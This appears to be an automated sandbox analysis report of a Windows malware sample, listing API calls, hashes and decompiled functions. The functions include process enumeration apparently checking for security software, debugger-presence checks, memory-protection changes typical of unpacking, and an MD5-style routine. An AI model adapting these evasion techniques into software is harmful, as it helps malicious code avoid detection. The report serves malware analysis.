                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170
                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 702A562A
                  • IsValidCodePage.KERNEL32(00000000), ref: 702A5673
                  • IsValidLocale.KERNEL32(?,00000001), ref: 702A5682
                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 702A56CA
                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 702A56E9
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                  • String ID:
                  • API String ID: 949163717-0
                  • Opcode ID: d0a6079cd0ac59e866de613702b287717bc3f992fd872aff452e04026c5abfea
                  • Instruction ID: be8a49f234e8b1772a324ea9554e333ce535761a108f6a0e6f8c45d16a17af3b
                  • Opcode Fuzzy Hash: d0a6079cd0ac59e866de613702b287717bc3f992fd872aff452e04026c5abfea
                  • Instruction Fuzzy Hash: 48515EB3A10216AFDB00DFA5CD45BAF77BDAF48710F904469ED16EB150EF70A9208B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualProtect.KERNEL32(70250000,00000000,00000004,702C20F8), ref: 702C23A8
                  • VirtualProtect.KERNEL32(00000000,?,00000002,702C20F8), ref: 702C249C
                  • VirtualProtect.KERNEL32(00000000,?,00000002,702C20F8,?), ref: 702C24F2
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 702C250E
                  Memory Dump Source
                  • Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false
                  Similarity
                  • API ID: Virtual$Protect$Free
                  • String ID:
                  • API String ID: 3866829018-0
                  • Opcode ID: 1934eca9a044f4914c454d14603cce44b96784b821f3975630d3290fa4c363fa
                  • Instruction ID: d3b4db10c5d6c2296c19dc8fb52278168408b0ee22f3210be340533835d7fa95
                  • Opcode Fuzzy Hash: 1934eca9a044f4914c454d14603cce44b96784b821f3975630d3290fa4c363fa
                  • Instruction Fuzzy Hash: 29513733500101AFDB21CF84C880F56B7BAEF98710B1942A4FD095F75ADB35A9759B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00DC31DD() {
                  				char _v264;
                  				void* _v300;
                  				int _t8;
                  				intOrPtr _t9;
                  				int _t15;
                  				void* _t17;
                  
                  				_t15 = 0;
                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                  				if(_t17 != 0) {
                  					_t8 = Process32First(_t17,  &_v300);
                  					while(_t8 != 0) {
                  						_t9 =  *0xdcd230; // 0x434a5a8
                  						_t2 = _t9 + 0xdcedf8; // 0x73617661
                  						_push( &_v264);
                  						if( *0xdcd0fc() != 0) {
                  							_t15 = 1;
                  						} else {
                  							_t8 = Process32Next(_t17,  &_v300);
                  							continue;
                  						}
                  						L7:
                  						CloseHandle(_t17);
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				L8:
                  				return _t15;
                  			}

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DC31ED
                  • Process32First.KERNEL32(00000000,?), ref: 00DC3200
                  • Process32Next.KERNEL32(00000000,?), ref: 00DC322C
                  • CloseHandle.KERNEL32(00000000), ref: 00DC323B
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 1c3b248e37482fe03046cd86623c15609b32f596a6601438223e7a3bdf7a4e25
                  • Instruction ID: 48e934eee6783a76ea882f674ac52f7c6eb8c83967566781651eb92813af99d6
                  • Opcode Fuzzy Hash: 1c3b248e37482fe03046cd86623c15609b32f596a6601438223e7a3bdf7a4e25
                  • Instruction Fuzzy Hash: 06F024721001676BDF20A72A9C09FEBB7ACEBC5310F000069F949D3100EB24DB868AB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E70251756() {
                  				void* _t1;
                  				long _t3;
                  				void* _t4;
                  				long _t5;
                  				void* _t6;
                  				intOrPtr _t8;
                  
                  				_t8 =  *0x70254130;
                  				_t1 = CreateEventA(0, 1, 0, 0);
                  				 *0x7025413c = _t1;
                  				if(_t1 == 0) {
                  					return GetLastError();
                  				}
                  				_t3 = GetVersion();
                  				if(_t3 <= 5) {
                  					_t4 = 0x32;
                  					return _t4;
                  				} else {
                  					 *0x7025412c = _t3;
                  					_t5 = GetCurrentProcessId();
                  					 *0x70254128 = _t5;
                  					 *0x70254130 = _t8;
                  					_t6 = OpenProcess(0x10047a, 0, _t5);
                  					 *0x70254124 = _t6;
                  					if(_t6 == 0) {
                  						 *0x70254124 =  *0x70254124 | 0xffffffff;
                  					}
                  					return 0;
                  				}
                  			}

                  APIs
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,7025117E), ref: 70251765
                  • GetVersion.KERNEL32(?,7025117E), ref: 70251774
                  • GetCurrentProcessId.KERNEL32(?,7025117E), ref: 70251783
                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,7025117E), ref: 7025179C
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Process$CreateCurrentEventOpenVersion
                  • String ID:
                  • API String ID: 845504543-0
                  • Opcode ID: 48c434754f01ae0b469864c2054afd3fe7504d2bad86307d704972bc26512ca0
                  • Instruction ID: bdd8fae891cc92f1708b01fa06a89dbd61b304cbb48815e7938fe35fdcf57493
                  • Opcode Fuzzy Hash: 48c434754f01ae0b469864c2054afd3fe7504d2bad86307d704972bc26512ca0
                  • Instruction Fuzzy Hash: F8F01D736597109BDB419F7BAC0D744BBA4A718726F3081D9F64AC51E0E7B08481AF5C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5024
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A506E
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5134
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: InfoLocale$ErrorLast_free
                  • String ID:
                  • API String ID: 3140898709-0
                  • Opcode ID: 7bb3e3d43e5562c4e785da6e935a282816ce81ecaaf94defd4c3b1ac271a72bb
                  • Instruction ID: cc67281bcb1711010764c1e8de1d24dc24cf495322f1e881c1c178a2fb9adfc0
                  • Opcode Fuzzy Hash: 7bb3e3d43e5562c4e785da6e935a282816ce81ecaaf94defd4c3b1ac271a72bb
                  • Instruction Fuzzy Hash: A2616CB25102279FDB198E24CD82BAF77B9EF04300F2041BAED16D6584EB35E9A5DF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7029983F
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 70299849
                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 70299856
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 50530b3816c87ccd3bec1967d1b2e9dd5d1ab9e78cc242fda852d36e1d1606bd
                  • Instruction ID: 7a4f93846b39a5fe8af97b61bb31320a6eb8fc44f1733899d6d507111f975694
                  • Opcode Fuzzy Hash: 50530b3816c87ccd3bec1967d1b2e9dd5d1ab9e78cc242fda852d36e1d1606bd
                  • Instruction Fuzzy Hash: 4731D87591122C9BCB21DF64DC88BCDBBB8BF08310F6041DAE41DA7250EB709B918F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E7025111B(void* __ecx) {
                  				char _v8;
                  				signed short _t7;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
                  				if(_t7 == 0) {
                  					__imp__GetSystemDefaultUILanguage();
                  					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                  				}
                  				return _v8;
                  			}

                  APIs
                  • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70251130
                  • GetSystemDefaultUILanguage.KERNEL32(?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 7025113A
                  • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 7025114D
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Language$DefaultInfoLocaleNameSystem
                  • String ID:
                  • API String ID: 3724080410-0
                  • Opcode ID: 5a21a4afd574772d4f0a99577815051967a7f68fe0543458e1cab7cfe49002b1
                  • Instruction ID: 62695af70ee757eb438f5b21de534e3d2d87ddb4ea997be464837ef16d366980
                  • Opcode Fuzzy Hash: 5a21a4afd574772d4f0a99577815051967a7f68fe0543458e1cab7cfe49002b1
                  • Instruction Fuzzy Hash: 50E04866754305B6E700D791CD0AF7D72BCA700706F5000C4F701E61C0D6B49E14AB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,70299DD6,702C0004,00000000,?,702C0004,?,7029C932), ref: 70299DF9
                  • TerminateProcess.KERNEL32(00000000,?,70299DD6,702C0004,00000000,?,702C0004,?,7029C932), ref: 70299E00
                  • ExitProcess.KERNEL32 ref: 70299E12
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: b459df95236f958897edad7cd207fd0c55822d4872a46eda19de5c98441c2fd0
                  • Instruction ID: e0386a505ecb712757ec34e42239afb6f5109515c10a66977c9a51aefa69e3b5
                  • Opcode Fuzzy Hash: b459df95236f958897edad7cd207fd0c55822d4872a46eda19de5c98441c2fd0
                  • Instruction Fuzzy Hash: 45E09273410208AFCF12AF6AC959B5E3B69FB44761F204415FD4A96130CA36EDA2DA84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3164d18365c9cc02fc8c42a8b13686f2a0b6139bbc0f02c0930cd9bbd3f41965
                  • Instruction ID: c8739ab25d65b260e15a7b2e502c1bb35d03b437565179190967154b6e510db5
                  • Opcode Fuzzy Hash: 3164d18365c9cc02fc8c42a8b13686f2a0b6139bbc0f02c0930cd9bbd3f41965
                  • Instruction Fuzzy Hash: 42F14FB2E0121A9FDF15DFA8C88069EBBB5FF88314F158169E819A7344DB30AD11CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsDebuggerPresent.KERNEL32(702B3DA0,702910AD,?,70298F76,?,702ADD40,00012012,?,00000240,702910AD,?,0000454A,702B3DA0,?,00000000,00000480), ref: 7029FA40
                  • OutputDebugStringW.KERNEL32(00000044,?,70298F76,?,702ADD40,00012012,?,00000240,702910AD,?,0000454A,702B3DA0,?,00000000,00000480), ref: 7029FA57
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: DebugDebuggerOutputPresentString
                  • String ID:
                  • API String ID: 4086329628-0
                  • Opcode ID: cdcc8eb5f0ad839700c12adf090bef2dbfc68b5d8c8f9ba960068d2e3e57758f
                  • Instruction ID: 50d62ee9ff14f0442547639acc9bd3e39c9c94dd94777e86c234a836fb7e4b21
                  • Opcode Fuzzy Hash: cdcc8eb5f0ad839700c12adf090bef2dbfc68b5d8c8f9ba960068d2e3e57758f
                  • Instruction Fuzzy Hash: D301F73303021AAEDBD15E914C46F5E3B1D9F01255F210401FD1EF6100CA25EC31A57D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID:
                  • API String ID: 4168288129-0
                  • Opcode ID: fb1e92c174c838e87018e9c875006258e2810467f591a77e1c3030087168bd18
                  • Instruction ID: 12c9bee75de45ff68ee8ac1340f43e5b66a7654b20e6889459940721a7c9d437
                  • Opcode Fuzzy Hash: fb1e92c174c838e87018e9c875006258e2810467f591a77e1c3030087168bd18
                  • Instruction Fuzzy Hash: E0C250B2E146298FDB25DE28CD407DDB7B9EB44314F1041EAD84EE7240EB78AE918F40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: u*p$u*p
                  • API String ID: 0-1932321899
                  • Opcode ID: e5a3d35e019e469b8abb6479994b339e288562e4fe2b487a8719f437532a1425
                  • Instruction ID: 6b0836e658c1b21ad30e3f21ff3fc555fba3fe6b98c6324f9a0a84a09b261c2a
                  • Opcode Fuzzy Hash: e5a3d35e019e469b8abb6479994b339e288562e4fe2b487a8719f437532a1425
                  • Instruction Fuzzy Hash: 8711A763F30C255B675C81698C1726EA1D2DBD824031F433AD826E7284E994DE23D290
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00DC28E9(void* __ecx, intOrPtr* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				void _v76;
                  				intOrPtr* _t226;
                  				signed int _t229;
                  				signed int _t231;
                  				signed int _t233;
                  				signed int _t235;
                  				signed int _t237;
                  				signed int _t239;
                  				signed int _t241;
                  				signed int _t243;
                  				signed int _t245;
                  				signed int _t247;
                  				signed int _t249;
                  				signed int _t251;
                  				signed int _t253;
                  				signed int _t255;
                  				signed int _t257;
                  				signed int _t259;
                  				signed int _t274;
                  				signed int _t337;
                  				void* _t347;
                  				signed int _t348;
                  				signed int _t350;
                  				signed int _t352;
                  				signed int _t354;
                  				signed int _t356;
                  				signed int _t358;
                  				signed int _t360;
                  				signed int _t362;
                  				signed int _t364;
                  				signed int _t366;
                  				signed int _t375;
                  				signed int _t377;
                  				signed int _t379;
                  				signed int _t381;
                  				signed int _t383;
                  				intOrPtr* _t399;
                  				signed int _t407;
                  				signed int _t409;
                  				signed int _t411;
                  				signed int _t413;
                  				signed int _t415;
                  				signed int _t417;
                  				signed int _t419;
                  				signed int _t421;
                  				signed int _t423;
                  				signed int _t425;
                  				signed int _t427;
                  				signed int _t429;
                  				signed int _t437;
                  				signed int _t439;
                  				signed int _t441;
                  				signed int _t443;
                  				signed int _t445;
                  				void* _t447;
                  				signed int _t507;
                  				signed int _t598;
                  				signed int _t606;
                  				signed int _t612;
                  				signed int _t678;
                  				signed int* _t681;
                  				signed int _t682;
                  				signed int _t684;
                  				signed int _t689;
                  				signed int _t691;
                  				signed int _t696;
                  				signed int _t698;
                  				signed int _t717;
                  				signed int _t719;
                  				signed int _t721;
                  				signed int _t723;
                  				signed int _t725;
                  				signed int _t727;
                  				signed int _t733;
                  				signed int _t739;
                  				signed int _t741;
                  				signed int _t743;
                  				signed int _t745;
                  				signed int _t747;
                  
                  				_t226 = _a4;
                  				_t347 = __ecx + 2;
                  				_t681 =  &_v76;
                  				_t447 = 0x10;
                  				do {
                  					_t274 =  *(_t347 - 1) & 0x000000ff;
                  					_t347 = _t347 + 4;
                  					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                  					_t681 =  &(_t681[1]);
                  					_t447 = _t447 - 1;
                  				} while (_t447 != 0);
                  				_t6 = _t226 + 4; // 0x14eb3fc3
                  				_t682 =  *_t6;
                  				_t7 = _t226 + 8; // 0x8d08458b
                  				_t407 =  *_t7;
                  				_t8 = _t226 + 0xc; // 0x56c1184c
                  				_t348 =  *_t8;
                  				asm("rol eax, 0x7");
                  				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                  				asm("rol ecx, 0xc");
                  				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                  				asm("ror edx, 0xf");
                  				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                  				asm("ror esi, 0xa");
                  				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                  				_v8 = _t684;
                  				_t689 = _v8;
                  				asm("rol eax, 0x7");
                  				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                  				asm("rol ecx, 0xc");
                  				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                  				asm("ror edx, 0xf");
                  				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                  				asm("ror esi, 0xa");
                  				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                  				_v8 = _t691;
                  				_t696 = _v8;
                  				asm("rol eax, 0x7");
                  				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                  				asm("rol ecx, 0xc");
                  				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                  				asm("ror edx, 0xf");
                  				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                  				asm("ror esi, 0xa");
                  				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                  				_v8 = _t698;
                  				asm("rol eax, 0x7");
                  				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                  				asm("rol ecx, 0xc");
                  				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                  				_t507 =  !_t356;
                  				asm("ror edx, 0xf");
                  				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                  				_v12 = _t415;
                  				_v12 =  !_v12;
                  				asm("ror esi, 0xa");
                  				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                  				asm("rol eax, 0x5");
                  				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                  				asm("rol ecx, 0x9");
                  				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                  				asm("rol edx, 0xe");
                  				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                  				asm("ror esi, 0xc");
                  				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                  				asm("rol eax, 0x5");
                  				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                  				asm("rol ecx, 0x9");
                  				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                  				asm("rol edx, 0xe");
                  				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                  				asm("ror esi, 0xc");
                  				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                  				asm("rol eax, 0x5");
                  				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                  				asm("rol ecx, 0x9");
                  				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                  				asm("rol edx, 0xe");
                  				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                  				asm("ror esi, 0xc");
                  				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                  				asm("rol eax, 0x5");
                  				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                  				asm("rol ecx, 0x9");
                  				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                  				asm("rol edx, 0xe");
                  				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                  				asm("ror esi, 0xc");
                  				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                  				asm("rol eax, 0x4");
                  				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                  				asm("rol ecx, 0xb");
                  				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                  				asm("rol edx, 0x10");
                  				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                  				_t598 = _t366 ^ _t425;
                  				asm("ror esi, 0x9");
                  				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                  				asm("rol eax, 0x4");
                  				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                  				asm("rol edi, 0xb");
                  				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                  				asm("rol edx, 0x10");
                  				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                  				_t337 = _t606 ^ _t427;
                  				asm("ror ecx, 0x9");
                  				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                  				asm("rol eax, 0x4");
                  				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                  				asm("rol esi, 0xb");
                  				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                  				asm("rol edi, 0x10");
                  				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                  				_t429 = _t733 ^ _t612;
                  				asm("ror ecx, 0x9");
                  				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                  				asm("rol eax, 0x4");
                  				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                  				asm("rol edx, 0xb");
                  				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                  				asm("rol esi, 0x10");
                  				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                  				asm("ror ecx, 0x9");
                  				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                  				asm("rol eax, 0x6");
                  				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                  				asm("rol edx, 0xa");
                  				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                  				asm("rol esi, 0xf");
                  				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                  				asm("ror ecx, 0xb");
                  				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                  				asm("rol eax, 0x6");
                  				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                  				asm("rol edx, 0xa");
                  				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                  				asm("rol esi, 0xf");
                  				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                  				asm("ror ecx, 0xb");
                  				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                  				asm("rol eax, 0x6");
                  				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                  				asm("rol edx, 0xa");
                  				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                  				asm("rol esi, 0xf");
                  				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                  				asm("ror edi, 0xb");
                  				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                  				asm("rol eax, 0x6");
                  				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                  				asm("rol edx, 0xa");
                  				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                  				_t399 = _a4;
                  				asm("rol esi, 0xf");
                  				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                  				 *_t399 =  *_t399 + _t259;
                  				asm("ror eax, 0xb");
                  				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                  				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                  				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                  				return memset( &_v76, 0, 0x40);
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                  • Instruction ID: 26ac845b9b60424e718f4eaa9eea75f3a0d278d3665ccec23048c4dd5fa3c16b
                  • Opcode Fuzzy Hash: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
                  • Instruction Fuzzy Hash: 7122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
